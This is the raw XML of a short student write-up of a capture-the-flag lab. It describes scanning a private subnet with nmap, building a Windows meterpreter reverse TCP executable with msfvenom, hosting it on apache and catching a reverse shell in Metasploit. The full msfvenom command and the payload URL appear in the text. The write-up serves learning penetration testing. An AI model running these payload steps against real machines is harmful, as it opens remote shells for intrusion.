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42B0" w14:textId="75F2BFCE" w:rsidR="00D3111B" w:rsidRDefault="00507228" w:rsidP="00507228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         Capture the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0A1C23B7" w14:textId="18335402" w:rsidR="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C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Spencer wise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A9391" w14:textId="2DE7C050" w:rsidR="00776EDA" w:rsidRPr="00776EDA" w:rsidRDefault="00776EDA" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00776EDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">You have two </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00776EDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>machines</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00776EDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> right? The machine that you attack with, and you have the target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00776EDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. The first step is to run an IFCONFIG to find the IP ADDRESS of YOUR machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> In my case it was 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFAD252" w14:textId="2EC984EC" w:rsidR="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C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351C1C2E" wp14:editId="07D02429">
            <wp:extent cx="4038600" cy="2184400"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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0CA2" w14:textId="69F33EA1" w:rsidR="00776EDA" w:rsidRPr="00776EDA" w:rsidRDefault="00776EDA" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that is </w:t>
      </w:r>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">known and jotted down you run a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>cidr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>notation;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> which in this case means to drop the 5, backslash, 24. This command should be able to pick up any other IP ADDRESSES on the SAME NETWORK from 10.0.2.1-24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313ACD13" w14:textId="1298700A" w:rsidR="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C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580DD745" wp14:editId="0920AFD6">
            <wp:extent cx="35814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B2FD" w14:textId="16B58644" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="007B28F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I then</w:t>
      </w:r>
      <w:r w:rsidRPr="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=</w:t>
      </w:r>
      <w:r w:rsidR="007B28F7" w:rsidRPr="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.15 </w:t>
      </w:r>
      <w:r w:rsidRPr="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LPORT=4444 -f exe -o /home/kali/Desktop/rs_exploitl.exe</w:t>
      </w:r>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B28F7" w:rsidRPr="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>to create a reverse TCP payload</w:t>
      </w:r>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is used to generate</w:t>
      </w:r>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>shellcode available in Metasploit.</w:t>
      </w:r>
      <w:r w:rsidR="007B28F7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit is an open-source penetrati</w:t>
      </w:r>
      <w:r w:rsidR="00E52D7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>on testing system and development platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F078B6D" w14:textId="77777777" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7C7D36" w14:textId="77777777" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Abbreviations / Flags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DC4553" w14:textId="77777777" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5C70A4" w14:textId="77777777" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>= (IP of Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A4E92" w14:textId="77777777" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>= (any port you wish to assign to the listener)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12850EC8" w14:textId="77777777" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">P= (Payload </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows, Android, PHP etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1594DD09" w14:textId="77777777" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>F= file extension (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows=exe, android=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF05599" w14:textId="77777777" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>o = “out file” to write to a location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0EFC81" w14:textId="41109251" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The payload will then download to the desktop since we used the “-o” flag to write the file to the desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EBEC58" w14:textId="33CA0F0F" w:rsidR="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C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3FEB70FA" wp14:editId="576E7DC4">
            <wp:extent cx="5943600" cy="88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57FA" w14:textId="7CEED1FB" w:rsidR="00E52D7D" w:rsidRDefault="00E52D7D" w:rsidP="00E52D7D">
      <w:pPr>
        <w:jc w:val="center"/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then</w:t>
      </w:r>
      <w:r w:rsidR="009D5D3C" w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>you open a</w:t>
      </w:r>
      <w:r w:rsidR="009D5D3C" w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> second terminal and use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52D7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Metasploit)</w:t>
      </w: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2B21FD42" wp14:editId="51FD9342">
            <wp:extent cx="3575050" cy="3422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3FB9" w14:textId="5C217206" w:rsidR="00E52D7D" w:rsidRDefault="00E52D7D" w:rsidP="00E52D7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BBE6E2" w14:textId="4B87AC08" w:rsidR="00E52D7D" w:rsidRDefault="00E52D7D" w:rsidP="00E52D7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FAAD2C" w14:textId="77777777" w:rsidR="00E52D7D" w:rsidRDefault="00E52D7D" w:rsidP="00E52D7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0078AA" w14:textId="77777777" w:rsidR="00E52D7D" w:rsidRDefault="00E52D7D" w:rsidP="00E52D7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130B3B4A" w14:textId="77777777" w:rsidR="00E52D7D" w:rsidRDefault="00E52D7D" w:rsidP="00E52D7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410DDE25" w14:textId="77777777" w:rsidR="00E52D7D" w:rsidRDefault="00E52D7D" w:rsidP="00E52D7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B07FEC" w14:textId="30EE4D07" w:rsidR="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="00E52D7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Once inside</w:t>
      </w:r>
      <w:r w:rsidR="00E52D7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">use the </w:t>
      </w:r>
      <w:r w:rsidR="00E52D7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52D7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidR="00E52D7D" w:rsidRPr="00E52D7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52D7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multi/handle</w:t>
      </w:r>
      <w:r w:rsidR="00E52D7D" w:rsidRPr="00E52D7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5D3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to configure the </w:t>
      </w:r>
      <w:r w:rsidR="00E52D7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3AE804" w14:textId="734A59FE" w:rsidR="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="00E52D7D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12968424" wp14:editId="32B0FAA2">
            <wp:extent cx="4641850" cy="3600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032F" w14:textId="2CF52FB5" w:rsidR="00776EDA" w:rsidRPr="00776EDA" w:rsidRDefault="00776EDA" w:rsidP="00776EDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00776EDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I copied the exploit file from the desktop to the webserver: /var/www/html/ directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484C1E01" w14:textId="77777777" w:rsidR="00776EDA" w:rsidRPr="00776EDA" w:rsidRDefault="00776EDA" w:rsidP="00776EDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B27F6D7" w14:textId="77777777" w:rsidR="00776EDA" w:rsidRPr="00776EDA" w:rsidRDefault="00776EDA" w:rsidP="00776EDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00776EDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I then started the apache2 server by using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37354DDA" w14:textId="77777777" w:rsidR="00776EDA" w:rsidRPr="00776EDA" w:rsidRDefault="00776EDA" w:rsidP="00776EDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066B4BEE" w14:textId="12F8836F" w:rsidR="00776EDA" w:rsidRPr="00776EDA" w:rsidRDefault="00776EDA" w:rsidP="00776EDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00776EDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">“Service apache2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00776EDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00776EDA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B046DF" w14:textId="079488A0" w:rsidR="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C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6B044ABE" wp14:editId="48C5B092">
            <wp:extent cx="2540000" cy="336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6E85" w14:textId="5533FFC7" w:rsidR="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="00776EDA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3B4871C5" wp14:editId="28747AC7">
            <wp:extent cx="1949450" cy="374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6B01" w14:textId="55083783" w:rsidR="00E52D7D" w:rsidRPr="00E52D7D" w:rsidRDefault="00E52D7D" w:rsidP="00776EDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I went into the target machine to execute the payload by entering </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="003F3302" w:rsidRPr="004F1609">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>http://10.0.2.15/rs.exploitl.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003F3302">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the URL (MY IP/PAYLOAD). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA8FF8" w14:textId="77777777" w:rsidR="00776EDA" w:rsidRDefault="00776EDA" w:rsidP="00776EDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0EBF72" w14:textId="37468305" w:rsidR="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C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10CC030D" wp14:editId="31F02206">
            <wp:extent cx="2089150" cy="10033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15E8" w14:textId="21FCA612" w:rsidR="003F3302" w:rsidRPr="003F3302" w:rsidRDefault="003F3302" w:rsidP="009D5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F3302">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloaded the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003F3302">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>file, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003F3302">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> went back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F3302">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F3302">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if I caught the reverse shell, in which I did.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C277409" w14:textId="6762AAF3" w:rsidR="009D5D3C" w:rsidRPr="009D5D3C" w:rsidRDefault="009D5D3C" w:rsidP="009D5D3C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6EC799CA" wp14:editId="3A90FDBA">
            <wp:extent cx="390525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D3C" w:rsidRPr="009D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C"/>
    <w:rsid w:val="003F3302"/>
    <w:rsid w:val="00507228"/>
    <w:rsid w:val="00776EDA"/>
    <w:rsid w:val="007B28F7"/>
    <w:rsid w:val="009D5D3C"/>
    <w:rsid w:val="00D3111B"/>
    <w:rsid w:val="00E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81DF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{08D5FFA0-99C3-49F4-B1B3-E005F65A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10.0.2.15/rs.exploitl.exe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WISE</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SPENCER WISE</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
